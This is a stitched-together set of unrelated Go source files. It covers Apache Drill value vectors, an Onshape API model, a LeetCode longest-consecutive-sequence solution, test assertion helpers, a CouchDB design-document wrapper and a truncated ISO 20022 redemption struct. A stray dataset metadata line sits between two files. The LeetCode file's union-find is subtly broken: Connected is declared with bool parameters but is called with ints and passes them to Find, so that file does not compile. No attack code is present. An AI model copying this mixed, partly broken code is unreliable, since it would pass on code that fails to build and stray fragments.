// TypeLen reports that bools are a fixed-width type.
func (BitVector) TypeLen() (int64, bool) {
	return 0, false
}

// Len returns the number of values in the vector.
func (b *BitVector) Len() int {
	return int(b.meta.GetValueCount())
}

// Get returns the bool at index: bit index%8 of byte index/8.
func (b *BitVector) Get(index uint) bool {
	byteVal := b.values[index>>3]
	mask := byte(1) << (index & 7)
	return byteVal&mask != 0
}

// Value returns the value at index boxed in an interface{}.
func (b *BitVector) Value(index uint) interface{} {
	return b.Get(index)
}

// NewBitVector constructs a BitVector over the given raw data buffer.
func NewBitVector(data []byte, meta *shared.SerializedField) *BitVector {
	return &BitVector{vector{data}, data, meta}
}
// NullableBitVector is a BitVector paired with a null bytemap.
type NullableBitVector struct {
	*BitVector
	nullByteMap
}

// Get returns a pointer to the bool at index, or nil when the value is
// null.
func (nb *NullableBitVector) Get(index uint) *bool {
	if nb.IsNull(index) {
		return nil
	}
	return proto.Bool(nb.BitVector.Get(index))
}

// Value returns the bool at index boxed in an interface{}, or an
// untyped nil when the value is null.
//
// Consistency fix: this previously returned the typed-nil *bool from
// Get, which boxes into a non-nil interface{}, so Value(i) == nil was
// never true for null entries. Other nullable vectors in this file
// (e.g. NullableVarcharVector.Value) return untyped nil; do the same.
func (nb *NullableBitVector) Value(index uint) interface{} {
	val := nb.Get(index)
	if val == nil {
		return nil
	}
	return *val
}

// NewNullableBitVector splits data into the null bytemap (the first
// ValueCount bytes) and the packed bit values that follow.
func NewNullableBitVector(data []byte, meta *shared.SerializedField) *NullableBitVector {
	bytemap := data[:meta.GetValueCount()]
	remaining := data[meta.GetValueCount():]
	return &NullableBitVector{
		NewBitVector(remaining, meta),
		nullByteMap{bytemap},
	}
}
// VarbinaryVector is a vector of variable-length byte strings, stored
// as a contiguous data buffer delimited by n+1 offsets.
type VarbinaryVector struct {
	vector
	offsets []uint32
	data    []byte
	meta    *shared.SerializedField
}

// Type returns the reflect type of []byte.
func (VarbinaryVector) Type() reflect.Type {
	return reflect.TypeOf([]byte{})
}

// TypeLen reports a variable-length type with a maximum length of
// 65535 bytes.
func (VarbinaryVector) TypeLen() (int64, bool) {
	return int64(math.MaxUint16), true
}

// Len returns the number of values in the vector.
func (v *VarbinaryVector) Len() int {
	return int(v.meta.GetValueCount())
}

// Get returns the bytes at index as a view into the shared buffer (not
// a copy).
func (v *VarbinaryVector) Get(index uint) []byte {
	return v.data[v.offsets[index]:v.offsets[index+1]]
}

// Value returns the value at index boxed in an interface{}.
func (v *VarbinaryVector) Value(index uint) interface{} {
	return v.Get(index)
}

// NewVarbinaryVector constructs a VarbinaryVector from a raw buffer
// laid out as a little-endian uint32 offset array followed by the
// string data.
func NewVarbinaryVector(data []byte, meta *shared.SerializedField) *VarbinaryVector {
	if data == nil {
		return &VarbinaryVector{
			vector:  vector{data},
			offsets: []uint32{},
			data:    []byte{},
			meta:    meta,
		}
	}
	// the offsets child metadata is nested one level deeper for
	// nullable (OPTIONAL) vectors
	var offsetField *shared.SerializedField
	if meta.MajorType.GetMode() == common.DataMode_REQUIRED {
		offsetField = meta.Child[0]
	} else {
		offsetField = meta.Child[1].Child[0]
	}
	offsetBytesSize := offsetField.GetBufferLength()
	offsetBytes := data[:offsetBytesSize]
	remaining := data[offsetBytesSize:]
	// ValueCount+1 offsets delimit ValueCount values
	offsetList := make([]uint32, meta.GetValueCount()+1)
	for i := 0; i < len(offsetList); i++ {
		offsetList[i] = binary.LittleEndian.Uint32(offsetBytes[i*4:])
	}
	return &VarbinaryVector{
		vector:  vector{data},
		offsets: offsetList,
		data:    remaining,
		meta:    meta,
	}
}
// VarcharVector is a VarbinaryVector whose values are interpreted as
// strings.
type VarcharVector struct {
	*VarbinaryVector
}

// Type returns the reflect type of string.
func (VarcharVector) Type() reflect.Type {
	return reflect.TypeOf(string(""))
}

// Get returns the string at index. The string aliases the vector's
// underlying buffer via unsafe (zero-copy), so the buffer must not be
// mutated while the string is in use.
func (v *VarcharVector) Get(index uint) string {
	b := v.VarbinaryVector.Get(index)
	return *(*string)(unsafe.Pointer(&b))
}

// NewVarcharVector constructs a VarcharVector over the raw buffer.
func NewVarcharVector(data []byte, meta *shared.SerializedField) *VarcharVector {
	return &VarcharVector{NewVarbinaryVector(data, meta)}
}

// NullableVarcharVector is a VarcharVector with a null bytemap.
type NullableVarcharVector struct {
	*VarcharVector
	nullByteMap
}

// Get returns a pointer to the string at index, or nil when the value
// is null. The string aliases the underlying buffer (zero-copy).
func (nv *NullableVarcharVector) Get(index uint) *string {
	if nv.IsNull(index) {
		return nil
	}
	b := nv.VarbinaryVector.Get(index)
	return (*string)(unsafe.Pointer(&b))
}

// Value returns the string at index boxed in an interface{}, or an
// untyped nil when the value is null.
func (nv *NullableVarcharVector) Value(index uint) interface{} {
	val := nv.Get(index)
	if val == nil {
		return nil
	}
	return *val
}

// NewNullableVarcharVector splits data into the null bytemap (the
// first ValueCount bytes) and the remaining varchar data.
func NewNullableVarcharVector(data []byte, meta *shared.SerializedField) *NullableVarcharVector {
	byteMap := data[:meta.GetValueCount()]
	remaining := data[meta.GetValueCount():]
	return &NullableVarcharVector{
		NewVarcharVector(remaining, meta),
		nullByteMap{byteMap},
	}
}
// DecimalVector is a fixed-width vector of decimal values whose byte
// layout is described by the supplied DecimalTraits.
type DecimalVector struct {
	*fixedWidthVec
	traits DecimalTraits // element byte width, digit count, sparse/dense
	scale int // decimal scale from the field's major type
	prec int32 // decimal precision from the field's major type
}
// NewDecimalVector constructs a DecimalVector over data, taking the
// element width from traits and scale/precision from the field metadata.
func NewDecimalVector(data []byte, meta *shared.SerializedField, traits DecimalTraits) *DecimalVector {
	return &DecimalVector{
		fixedWidthVec: &fixedWidthVec{data: data, valsz: traits.ByteWidth(), meta: meta},
		scale: int(meta.MajorType.GetScale()),
		prec: meta.MajorType.GetPrecision(),
		traits: traits,
	}
}
// Get decodes the value at index into a *big.Float. Only sparse decimal
// representations are supported; dense vectors cause a panic.
func (dv *DecimalVector) Get(index uint) *big.Float {
	valbytes := dv.getval(int(index))
	if !dv.traits.IsSparse() {
		panic("go-drill: currently only supports decimal sparse vectors, not dense")
	}
	return getFloatFromBytes(valbytes, dv.traits.NumDigits(), dv.scale, dv.traits.IsSparse())
}
// Value returns the value at index boxed as interface{}.
func (dv *DecimalVector) Value(index uint) interface{} {
	return dv.Get(index)
}
// NullableDecimalVector is the nullable variant of DecimalVector; a nil
// value slice from the underlying vector indicates NULL.
type NullableDecimalVector struct {
	*nullableFixedWidthVec
	traits DecimalTraits // element byte width, digit count, sparse/dense
	scale int // decimal scale from the field's major type
	prec int32 // decimal precision from the field's major type
}
// Get decodes the value at index into a *big.Float, returning nil for
// NULL entries. Only sparse decimal representations are supported; dense
// vectors cause a panic.
func (dv *NullableDecimalVector) Get(index uint) *big.Float {
	valbytes := dv.getval(int(index))
	if valbytes == nil {
		return nil
	}
	if !dv.traits.IsSparse() {
		panic("go-drill: currently only supports decimal sparse vectors, not dense")
	}
	return getFloatFromBytes(valbytes, dv.traits.NumDigits(), dv.scale, dv.traits.IsSparse())
}
// Value returns the value at index boxed as interface{}. NOTE(review):
// unlike NullableVarcharVector.Value this returns a typed nil *big.Float
// for NULLs, so the result compares != nil as an interface — confirm
// callers handle that.
func (dv *NullableDecimalVector) Value(index uint) interface{} {
	return dv.Get(index)
}
// NewNullableDecimalVector constructs a NullableDecimalVector over data,
// taking the element width from traits and scale/precision from meta.
func NewNullableDecimalVector(data []byte, meta *shared.SerializedField, traits DecimalTraits) *NullableDecimalVector {
	return &NullableDecimalVector{
		nullableFixedWidthVec: newNullableFixedWidth(data, meta, traits.ByteWidth()),
		scale: int(meta.MajorType.GetScale()),
		prec: meta.MajorType.GetPrecision(),
		traits: traits,
	}
}
// NewValueVec builds the appropriate DataVector implementation for the
// field described by meta. Numeric types are tried first; otherwise the
// constructor is selected by the field's minor type, with OPTIONAL mode
// mapping to the nullable variants. Returns nil for unsupported types.
func NewValueVec(rawData []byte, meta *shared.SerializedField) DataVector {
	ret := NewNumericValueVec(rawData, meta)
	if ret != nil {
		return ret
	}
	if meta.GetMajorType().GetMode() == common.DataMode_OPTIONAL {
		// NOTE(review): there is no MinorType_VARBINARY case here even
		// though the non-optional branch handles it — confirm whether
		// nullable varbinary is intentionally unsupported.
		switch meta.GetMajorType().GetMinorType() {
		case common.MinorType_BIT:
			return NewNullableBitVector(rawData, meta)
		case common.MinorType_VARCHAR:
			return NewNullableVarcharVector(rawData, meta)
		case common.MinorType_TIMESTAMP:
			return NewNullableTimestampVector(rawData, meta)
		case common.MinorType_DATE:
			return NewNullableDateVector(rawData, meta)
		case common.MinorType_TIME:
			return NewNullableTimeVector(rawData, meta)
		case common.MinorType_INTERVAL:
			return NewNullableIntervalVector(rawData, meta)
		case common.MinorType_INTERVALDAY:
			return NewNullableIntervalDayVector(rawData, meta)
		case common.MinorType_INTERVALYEAR:
			return NewNullableIntervalYearVector(rawData, meta)
		case common.MinorType_DECIMAL28SPARSE:
			return NewNullableDecimalVector(rawData, meta, &Decimal28SparseTraits)
		case common.MinorType_DECIMAL38SPARSE:
			return NewNullableDecimalVector(rawData, meta, &Decimal38SparseTraits)
		}
	} else {
		// Non-optional (REQUIRED or other) modes use the plain vectors.
		switch meta.GetMajorType().GetMinorType() {
		case common.MinorType_VARBINARY:
			return NewVarbinaryVector(rawData, meta)
		case common.MinorType_VARCHAR:
			return NewVarcharVector(rawData, meta)
		case common.MinorType_BIT:
			return NewBitVector(rawData, meta)
		case common.MinorType_TIMESTAMP:
			return NewTimestampVector(rawData, meta)
		case common.MinorType_DATE:
			return NewDateVector(rawData, meta)
		case common.MinorType_TIME:
			return NewTimeVector(rawData, meta)
		case common.MinorType_INTERVAL:
			return NewIntervalVector(rawData, meta)
		case common.MinorType_INTERVALDAY:
			return NewIntervalDayVector(rawData, meta)
		case common.MinorType_INTERVALYEAR:
			return NewIntervalYearVector(rawData, meta)
		case common.MinorType_DECIMAL28SPARSE:
			return NewDecimalVector(rawData, meta, &Decimal28SparseTraits)
		case common.MinorType_DECIMAL38SPARSE:
			return NewDecimalVector(rawData, meta, &Decimal38SparseTraits)
		}
	}
	return nil
}
package onshape
import (
"encoding/json"
)
// BTExportTessellatedEdgesBody890AllOf is the allOf composition part of the
// BTExportTessellatedEdgesBody890 API model. Both fields are optional and
// omitted from JSON when nil.
type BTExportTessellatedEdgesBody890AllOf struct {
	BtType *string `json:"btType,omitempty"`
	Edges *[]BTExportTessellatedEdgesEdge1364 `json:"edges,omitempty"`
}
// NewBTExportTessellatedEdgesBody890AllOf instantiates a new BTExportTessellatedEdgesBody890AllOf object
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed
func NewBTExportTessellatedEdgesBody890AllOf() *BTExportTessellatedEdgesBody890AllOf {
	this := BTExportTessellatedEdgesBody890AllOf{}
	return &this
}
// NewBTExportTessellatedEdgesBody890AllOfWithDefaults instantiates a new BTExportTessellatedEdgesBody890AllOf object
// This constructor will only assign default values to properties that have it defined,
// but it doesn't guarantee that properties required by API are set
// (currently identical to the plain constructor, as no defaults are defined).
func NewBTExportTessellatedEdgesBody890AllOfWithDefaults() *BTExportTessellatedEdgesBody890AllOf {
	this := BTExportTessellatedEdgesBody890AllOf{}
	return &this
}
// GetBtType returns the BtType field value if set, zero value otherwise.
func (o *BTExportTessellatedEdgesBody890AllOf) GetBtType() string {
	if bt, ok := o.GetBtTypeOk(); ok {
		return *bt
	}
	return ""
}
// GetBtTypeOk returns a tuple with the BtType field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BTExportTessellatedEdgesBody890AllOf) GetBtTypeOk() (*string, bool) {
	if o == nil || o.BtType == nil {
		return nil, false
	}
	return o.BtType, true
}
// HasBtType returns a boolean if a field has been set.
func (o *BTExportTessellatedEdgesBody890AllOf) HasBtType() bool {
	return o != nil && o.BtType != nil
}
// SetBtType gets a reference to the given string and assigns it to the BtType field.
func (o *BTExportTessellatedEdgesBody890AllOf) SetBtType(v string) {
	o.BtType = &v
}
// GetEdges returns the Edges field value if set, zero value otherwise.
func (o *BTExportTessellatedEdgesBody890AllOf) GetEdges() []BTExportTessellatedEdgesEdge1364 {
	if edges, ok := o.GetEdgesOk(); ok {
		return *edges
	}
	return nil
}
// GetEdgesOk returns a tuple with the Edges field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BTExportTessellatedEdgesBody890AllOf) GetEdgesOk() (*[]BTExportTessellatedEdgesEdge1364, bool) {
	if o == nil || o.Edges == nil {
		return nil, false
	}
	return o.Edges, true
}
// HasEdges returns a boolean if a field has been set.
func (o *BTExportTessellatedEdgesBody890AllOf) HasEdges() bool {
	return o != nil && o.Edges != nil
}
// SetEdges gets a reference to the given []BTExportTessellatedEdgesEdge1364 and assigns it to the Edges field.
func (o *BTExportTessellatedEdgesBody890AllOf) SetEdges(v []BTExportTessellatedEdgesEdge1364) {
	o.Edges = &v
}
// MarshalJSON serializes the model, emitting only the fields that are set
// so that unset optional properties are omitted entirely.
func (o BTExportTessellatedEdgesBody890AllOf) MarshalJSON() ([]byte, error) {
	toSerialize := map[string]interface{}{}
	if o.BtType != nil {
		toSerialize["btType"] = o.BtType
	}
	if o.Edges != nil {
		toSerialize["edges"] = o.Edges
	}
	return json.Marshal(toSerialize)
}
// NullableBTExportTessellatedEdgesBody890AllOf wraps the model with an
// explicit "set" flag so that JSON null can be distinguished from absent.
type NullableBTExportTessellatedEdgesBody890AllOf struct {
	value *BTExportTessellatedEdgesBody890AllOf
	isSet bool
}
// Get returns the wrapped value (nil when unset or explicitly null).
func (v NullableBTExportTessellatedEdgesBody890AllOf) Get() *BTExportTessellatedEdgesBody890AllOf {
	return v.value
}
// Set stores val and marks the wrapper as set.
func (v *NullableBTExportTessellatedEdgesBody890AllOf) Set(val *BTExportTessellatedEdgesBody890AllOf) {
	v.value = val
	v.isSet = true
}
// IsSet reports whether Set or UnmarshalJSON has been called.
func (v NullableBTExportTessellatedEdgesBody890AllOf) IsSet() bool {
	return v.isSet
}
// Unset clears the value and the set flag.
func (v *NullableBTExportTessellatedEdgesBody890AllOf) Unset() {
	v.value = nil
	v.isSet = false
}
// NewNullableBTExportTessellatedEdgesBody890AllOf returns a wrapper already
// marked as set, holding val.
func NewNullableBTExportTessellatedEdgesBody890AllOf(val *BTExportTessellatedEdgesBody890AllOf) *NullableBTExportTessellatedEdgesBody890AllOf {
	return &NullableBTExportTessellatedEdgesBody890AllOf{value: val, isSet: true}
}
// MarshalJSON serializes the wrapped value (nil marshals to JSON null).
func (v NullableBTExportTessellatedEdgesBody890AllOf) MarshalJSON() ([]byte, error) {
	return json.Marshal(v.value)
}
// UnmarshalJSON decodes src into the wrapped value and marks it set, so a
// JSON null is recorded as "explicitly set to null".
func (v *NullableBTExportTessellatedEdgesBody890AllOf) UnmarshalJSON(src []byte) error {
	v.isSet = true
	return json.Unmarshal(src, &v.value)
}
package main
import (
"log"
)
/**
题目:https://leetcode-cn.com/problems/longest-consecutive-sequence/
最长连续序列
给定一个未排序的整数数组 nums ,找出数字连续的最长序列(不要求序列元素在原数组中连续)的长度。
请你设计并实现时间复杂度为O(n) 的算法解决此问题。
示例 1:
输入:nums = [100,4,200,1,3,2]
输出:4
解释:最长数字连续序列是 [1, 2, 3, 4]。它的长度为 4。
示例 2:
输入:nums = [0,3,7,2,5,8,4,6,0,1]
输出:9
提示:
0 <= nums.length <= 105
-109 <= nums[i] <= 109
*/
// main runs both solutions on the first sample input and logs the results.
func main() {
	nums := []int{100, 4, 200, 1, 3, 2}
	log.Println("最长连续序列-哈希:", longestConsecutive(nums))
	log.Println("最长连续序列-并查集:", longestConsecutive2(nums))
}
// longestConsecutive returns the length of the longest run of consecutive
// integers contained in nums (the elements need not be adjacent in the
// input). Runs in O(n) time using a set: counting only ever starts from
// the smallest element of a run, so each element is visited O(1) times.
func longestConsecutive(nums []int) int {
	present := make(map[int]bool, len(nums))
	for _, n := range nums {
		present[n] = true
	}
	best := 0
	for n := range present {
		// Skip n unless it is the start of a run (n-1 absent).
		if present[n-1] {
			continue
		}
		length := 1
		for cur := n; present[cur+1]; cur++ {
			length++
		}
		if length > best {
			best = length
		}
	}
	return best
}
// longestConsecutive2 并查集
func longestConsecutive2(nums []int) int {
uf := NewUF(nums)
res := 0
for i := 0; i < len(nums); i++ { //遍历数组
n, tmp := nums[i], nums[i] //tmp记录原始值
for {
if _, ok := uf.Find(n - 1); !ok { //如果不存在比当前值-1的值,则肯定不连通
break
}
if !uf.Connected(n-1, n) { //如果存在n-1并且还没有连通,则连一下
uf.Union(n-1, n)
n = n - 1
} else { //如果n-1与n是连通的,则求一下父节点值
n, _ = uf.Find(n)
break
}
}
res = max(res, tmp-n+1) //记录一下,连同节点的最大距离即为最长序列
}
return res
}
// max returns the larger of a and b.
func max(a, b int) int {
	if b > a {
		return b
	}
	return a
}
// UF is a union-find (disjoint set) structure keyed by the int values
// themselves rather than by dense indices.
type UF struct {
	parent map[int]int // parent of each node; roots point to themselves
}
// NewUF builds a union-find containing each value in nums as its own set.
func NewUF(nums []int) *UF {
	uf := UF{}
	uf.parent = make(map[int]int)
	for _, num := range nums {
		uf.parent[num] = num
	}
	return &uf
}
// Connected reports whether a and b belong to the same set.
func (uf *UF) Connected(a, b bool) bool {
	pA, _ := uf.Find(a)
	pB, _ := uf.Find(b)
	return pA == pB
}
// Union merges the sets containing a and b, keeping the smaller root
// value as the merged set's root.
func (uf *UF) Union(a, b int) {
	pA, _ := uf.Find(a)
	pB, _ := uf.Find(b)
	if pA == pB {
		return
	}
	if pA > pB { // the smaller value becomes the parent
		uf.parent[pA] = pB
	} else {
		uf.parent[pB] = pA
	}
}
// Find returns the root of a's set and whether a exists in the structure.
func (uf *UF) Find(a int) (int, bool) {
	if _, ok := uf.parent[a]; !ok {
		return -1, false
	}
	for a != uf.parent[a] {
		uf.parent[a] = uf.parent[uf.parent[a]] // path halving to flatten the tree
		a = uf.parent[a]
	}
	return a, true
}
package testing
import (
"testing"
)
const (
	// notEqual is the default failure message format; it takes the
	// got and want values as its two formatting arguments.
	notEqual = "assertion failed\ngot :\t>[\t%v\t]<\nwant :\t>[\t%v\t]<"
)
// assert invokes method and reports a test failure using the given context
// message when it returns false. If args are supplied, context is used as
// a format string for them.
func assert(t *testing.T, method func() bool,
	context string, args ...interface{}) {
	t.Helper()
	if method() {
		return
	}
	if len(args) > 0 {
		t.Errorf(context, args...)
		return
	}
	// Use Error rather than Errorf(context): with no arguments a context
	// string containing '%' verbs would be mangled by the formatter, and
	// go vet's printf check flags the non-constant format string.
	t.Error(context)
}
// assertSimpleEqualContext fails the test with the formatted context
// message when have != want (compared with ==).
func assertSimpleEqualContext(t *testing.T, have, want interface{},
	context string, args ...interface{}) {
	t.Helper()
	assert(t, func() bool { return have == want }, context, args...)
}
// assertSimpleNotEqualContext fails the test with the formatted context
// message when have == want.
func assertSimpleNotEqualContext(t *testing.T, have, want interface{},
	context string, args ...interface{}) {
	t.Helper()
	assert(t, func() bool { return have != want }, context, args...)
}
// assertSimpleEqual fails the test with the default notEqual message
// when have != want.
func assertSimpleEqual(t *testing.T, have, want interface{}) {
	t.Helper()
	assertSimpleEqualContext(t, have, want, notEqual, have, want)
}
// assertSimpleNotEqual fails the test with the default notEqual message
// when have == want.
func assertSimpleNotEqual(t *testing.T, have, want interface{}) {
	t.Helper()
	assertSimpleNotEqualContext(t, have, want, notEqual, have, want)
}
// AssertEqual runs an assertion that the arguments are equal.
func AssertEqual(t *testing.T, have, want interface{}) {
	t.Helper()
	assertSimpleEqual(t, have, want)
}
// AssertEqualContext runs an assertion that the arguments are equal;
// on failure the formatted context message is reported.
func AssertEqualContext(t *testing.T, have, want interface{},
	context string, args ...interface{}) {
	t.Helper()
	assertSimpleEqualContext(t, have, want, context, args...)
}
// AssertNotEqual runs an assertion that the arguments are not equal.
func AssertNotEqual(t *testing.T, have, want interface{}) {
	t.Helper()
	assertSimpleNotEqual(t, have, want)
}
// func AssertNotEqualContext(have, want interface{}, context string, args ...interface{}) {
// 	assertSimpleNotEqualContext(have, want, context, args)
// }
// AssertNotNil runs an assertion that the argument is not nil.
func AssertNotNil(t *testing.T, have interface{}) {
	t.Helper()
	assertSimpleNotEqual(t, have, nil)
}
// AssertNil runs an assertion that the argument is nil.
func AssertNil(t *testing.T, have interface{}) {
	t.Helper()
	assertSimpleEqual(t, have, nil)
}
// AssertTrue runs an assertion that the bool argument is true.
func AssertTrue(t *testing.T, have bool) {
	t.Helper()
	assertSimpleEqual(t, have, true)
}
// func AssertTrueContext(have bool, context string, args ...interface{}) {
// 	assertSimpleEqualContext(have, true, context, args...)
// }
// AssertFalse runs an assertion that the bool argument is false.
func AssertFalse(t *testing.T, have bool) {
	t.Helper()
	assertSimpleEqual(t, have, false)
}
// func AssertFalseContext(have bool, context string, args ...interface{}) {
// 	assertSimpleEqualContext(have, false, context, args...)
// }
// AssertStringEqual runs an assertion that the two string arguments are equal.
func AssertStringEqual(t *testing.T, have, want string) {
	t.Helper()
	assertSimpleEqual(t, have, want)
}
// func AssertStringEqualContext(have, want string, context string, args ...interface{}) {
// 	assertSimpleEqualContext(have, want, context, args...)
// }
// AssertStringNotEqual runs an assertion that the two string arguments are not equal.
func AssertStringNotEqual(t *testing.T, have, want string) {
	t.Helper()
	assertSimpleNotEqual(t, have, want)
}
// func AssertStringNotEqualContext(have, want string, context string, args ...interface{}) {
// 	assertSimpleNotEqualContext(have, want, context, args...)
// }
// AssertIntEqual runs an assertion that the two int arguments are equal.
func AssertIntEqual(t *testing.T, have, want int) {
	t.Helper()
	assertSimpleEqual(t, have, want)
}
// func AssertIntNotEqual(have, want int) {
// 	assertSimpleNotEqual(have, want)
// }
// func AssertMapEqual(have, want map[string]string) {
// 	Assert(func() bool { return reflect.DeepEqual(have, want) }, notEqual, have, want)
// }
package couchdb
//--------------------
// DESIGN
//--------------------
// Design provides convenient access to a design document.
type Design interface {
// ID returns the ID of the design.
ID() string
// Language returns the language for views and shows.
Language() string
// Language sets the language for views and shows.
SetLanguage(language string)
// View returns the map and the reduce functions of the
// view with the ID, otherwise false.
View(id string) (string, string, bool)
// SetView sets the map and the reduce functions of the
// view with the ID.
SetView(id, mapf, reducef string)
// Show returns the show function with the ID, otherwise false.
Show(id string) (string, bool)
// SetShow sets the show function with the ID.
SetShow(id, showf string)
// Write creates a new design document or updates an
// existing one.
Write(rps ...Parameter) ResultSet
// Delete a design document.
Delete(rps ...Parameter) ResultSet
}
// design implements the Design interface.
type design struct {
	cdb *couchdb // database connection the document lives in
	id string // design ID without the "_design/" prefix
	document *designDocument // in-memory copy of the design document
}
// newDesign creates a design instance for the given ID. If a document
// "_design/<id>" already exists it is read from the database; otherwise a
// fresh in-memory document (language "javascript") is prepared, to be
// persisted later via Write.
func newDesign(cdb *couchdb, id string) (*design, error) {
	designID := "_design/" + id
	ok, err := cdb.HasDocument(designID)
	if err != nil {
		return nil, err
	}
	document := designDocument{}
	if ok {
		// Read the design document.
		resp := cdb.ReadDocument(designID)
		if !resp.IsOK() {
			return nil, resp.Error()
		}
		err = resp.Document(&document)
		if err != nil {
			return nil, err
		}
	} else {
		// Create the design document.
		document = designDocument{
			ID: designID,
			Language: "javascript",
		}
	}
	d := &design{
		cdb: cdb,
		id: id,
		document: &document,
	}
	return d, nil
}
// ID implements the Design interface.
func (d *design) ID() string {
	return d.id
}
// Language implements the Design interface.
func (d *design) Language() string {
	return d.document.Language
}
// SetLanguage implements the Design interface.
func (d *design) SetLanguage(language string) {
	d.document.Language = language
}
// View implements the Design interface. The views map is lazily
// initialized so a freshly created document can be queried safely.
func (d *design) View(id string) (string, string, bool) {
	if d.document.Views == nil {
		d.document.Views = designViews{}
	}
	view, ok := d.document.Views[id]
	if !ok {
		return "", "", false
	}
	return view.Map, view.Reduce, true
}
// SetView implements the Design interface.
func (d *design) SetView(id, mapf, reducef string) {
	if d.document.Views == nil {
		d.document.Views = designViews{}
	}
	d.document.Views[id] = designView{
		Map: mapf,
		Reduce: reducef,
	}
}
// Show implements the Design interface. The shows map is lazily
// initialized so a freshly created document can be queried safely.
func (d *design) Show(id string) (string, bool) {
	if d.document.Shows == nil {
		d.document.Shows = map[string]string{}
	}
	show, ok := d.document.Shows[id]
	if !ok {
		return "", false
	}
	return show, true
}
// SetShow implements the Design interface.
func (d *design) SetShow(id, showf string) {
	if d.document.Shows == nil {
		d.document.Shows = map[string]string{}
	}
	d.document.Shows[id] = showf
}
// Write implements the Design interface. An empty revision means the
// document has never been persisted, so it is created rather than updated.
func (d *design) Write(rps ...Parameter) ResultSet {
	if d.document.Revision == "" {
		return d.cdb.CreateDocument(d.document, rps...)
	}
	return d.cdb.UpdateDocument(d.document, rps...)
}
// Delete implements the Design interface.
func (d *design) Delete(rps ...Parameter) ResultSet {
	return d.cdb.DeleteDocument(d.document, rps...)
}
//--------------------
// DESIGN DOCUMENT
//--------------------
// designView defines a view inside a design document.
type designView struct {
	Map string `json:"map,omitempty"`
	Reduce string `json:"reduce,omitempty"`
}
// designViews maps view IDs to their view definitions.
type designViews map[string]designView
// designAttachment defines an attachment inside a design document.
type designAttachment struct {
	Stub bool `json:"stub,omitempty"`
	ContentType string `json:"content_type,omitempty"`
	Length int `json:"length,omitempty"`
}
// designAttachments maps attachment names to their metadata.
type designAttachments map[string]designAttachment
// designDocument contains the data of view design documents as stored
// in CouchDB (fields mirror the design document JSON schema).
type designDocument struct {
	ID string `json:"_id"`
	Revision string `json:"_rev,omitempty"`
	Language string `json:"language,omitempty"`
	ValidateDocumentUpdate string `json:"validate_doc_update,omitempty"`
	Views designViews `json:"views,omitempty"`
	Shows map[string]string `json:"shows,omitempty"`
	Attachments designAttachments `json:"_attachments,omitempty"`
	Signatures map[string]string `json:"signatures,omitempty"`
	Libraries interface{} `json:"libs,omitempty"`
}
// EOF | couchdb/design.go | 0.725357 | 0.448004 | design.go | starcoder |
package iso20022
// Execution of a redemption order.
type RedemptionExecution5 struct {
// Unique and unambiguous identifier for an order, as assigned by the instructing party.
OrderReference *Max35Text `xml:"OrdrRef"`
// Unique and unambiguous investor's identification of an order. This reference can typically be used in a hub scenario to give the reference of the order as assigned by the underlying client.
ClientReference *Max35Text `xml:"ClntRef,omitempty"`
// Unique and unambiguous identifier for an order execution, as assigned by a confirming party.
DealReference *Max35Text `xml:"DealRef"`
// Specifies the category of the investment fund order.
OrderType []*FundOrderType3 `xml:"OrdrTp,omitempty"`
// Additional information about the investor.
BeneficiaryDetails *IndividualPerson12 `xml:"BnfcryDtls,omitempty"`
// Number of investment funds units redeemed.
UnitsNumber *FinancialInstrumentQuantity1 `xml:"UnitsNb"`
// Indicates the rounding direction applied to nearest unit.
Rounding *RoundingDirection2Code `xml:"Rndg,omitempty"`
// Amount of money paid to the investor as a result of the redemption after deduction of charges, commissions and taxes.
// [(Quantity * Price) - (Charges + Commissions +Taxes)]
NetAmount *ActiveCurrencyAndAmount `xml:"NetAmt,omitempty"`
// Account between an investor(s) and a fund manager or a fund. The account can contain holdings in any investment fund or investment fund class managed (or distributed) by the fund manager, within the same fund family.
InvestmentAccountDetails *InvestmentAccount21 `xml:"InvstmtAcctDtls"`
// Portion of the investor's holdings, in a specific investment fund/ fund class, that is redeemed.
HoldingsRedemptionRate *PercentageRate `xml:"HldgsRedRate,omitempty"`
// Amount of money resulting from the redemption before deduction of charges, commissions and taxes.
// [Quantity * Price]
GrossAmount *ActiveCurrencyAndAmount `xml:"GrssAmt,omitempty"`
// Date and time at which a price is applied, according to the terms stated in the prospectus.
TradeDateTime *DateAndDateTimeChoice `xml:"TradDtTm"`
// Total amount of money paid /to be paid or received in exchange for the financial instrument in the individual order.
SettlementAmount *ActiveCurrencyAndAmount `xml:"SttlmAmt"`
// Date on which cash is available.
CashSettlementDate *ISODate `xml:"CshSttlmDt,omitempty"`
// Method by which the transaction is settled.
SettlementMethod *DeliveryReceiptType2Code `xml:"SttlmMtd,omitempty"`
// Price at which the order was executed.
DealingPriceDetails *UnitPrice10 `xml:"DealgPricDtls"`
// Other quoted price than the one at which the order was executed.
InformativePriceDetails []*UnitPrice10 `xml:"InftvPricDtls,omitempty"`
// Indicates whether the order has been partially executed, ie, the confirmed quantity does not match the ordered quantity for a given financial instrument.
PartiallyExecutedIndicator *YesNoIndicator `xml:"PrtlyExctdInd"`
// Specifies that the execution was subject to best execution rules as defined by MiFID.
BestExecution *BestExecution1Code `xml:"BestExctn,omitempty"`
// Indicates whether the dividend is included, ie, cum-dividend, in the executed price. When the dividend is not included, the price will be ex-dividend.
CumDividendIndicator *YesNoIndicator `xml:"CumDvddInd"`
// Part of the price deemed as accrued income or profit rather than capital. The interim profit amount is used for tax purposes.
InterimProfitAmount *ProfitAndLoss1Choice `xml:"IntrmPrftAmt,omitempty"`
// Information needed to process a currency exchange or conversion.
ForeignExchangeDetails []*ForeignExchangeTerms7 `xml:"FXDtls,omitempty"`
// Dividend option chosen by the account owner based on the options offered in the prospectus.
IncomePreference *IncomePreference1Code `xml:"IncmPref,omitempty"`
// Tax group to which the purchased investment fund units belong. The investor indicates to the intermediary operating pooled nominees, which type of unit is to be sold.
Group1Or2Units *UKTaxGroupUnitCode `xml:"Grp1Or2Units,omitempty"`
// Amount of money associated with a service.
ChargeGeneralDetails *TotalCharges3 `xml:"ChrgGnlDtls,omitempty"`
// Amount of money due to a party as compensation for a service.
CommissionGeneralDetails *TotalCommissions3 `xml:"ComssnGnlDtls,omitempty"`
// Breakdown of the net amount per type of order.
StaffClientBreakdown []*InvestmentFundsOrderBreakdown1 `xml:"StffClntBrkdwn,omitempty"`
// Tax related to an investment fund order.
